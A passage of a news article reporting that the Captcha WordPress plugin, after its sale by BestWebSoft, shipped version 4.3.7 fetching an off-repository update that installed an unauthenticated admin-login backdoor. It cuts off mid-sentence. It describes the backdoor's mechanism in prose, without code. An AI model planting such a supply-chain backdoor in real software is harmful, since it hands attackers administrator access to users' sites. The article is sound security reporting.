A WordPress plugin installed on over 300,000 sites was recently modified to download and install a hidden backdoor. The WordPress team has intervened and removed this plugin from the official WordPress Plugins repository, also providing clean versions for affected customers.
Known only as Captcha, the plugin was one of the most popular CAPTCHA plugins on the official WordPress site and was the work of a well-established plugin developer named BestWebSoft, a company behind many other popular WordPress plugins.
Plugin sold in September, backdoored in December
BestWebSoft sold the free version of its Captcha plugin to a new developer named Simply WordPress on September 5, according to a blog post on the company’s site.
Exactly three months after the sale, the plugin’s new owner shipped Captcha version 4.3.7, which contained malicious code that would connect to the simplywordpress.net domain and download a plugin update package from outside the official WordPress repository (against WordPress.org rules). This sneaky update package would install a backdoor on sites using the plugin.
“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself,” says Matt Barry, Wordfence security researcher. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”
Further, there’s also code to trigger a clean update that removes any traces of the back door, just in case the attacker decides to erase all his tracks.
Backdoor discovered by accident
Initially, the update didn’t catch…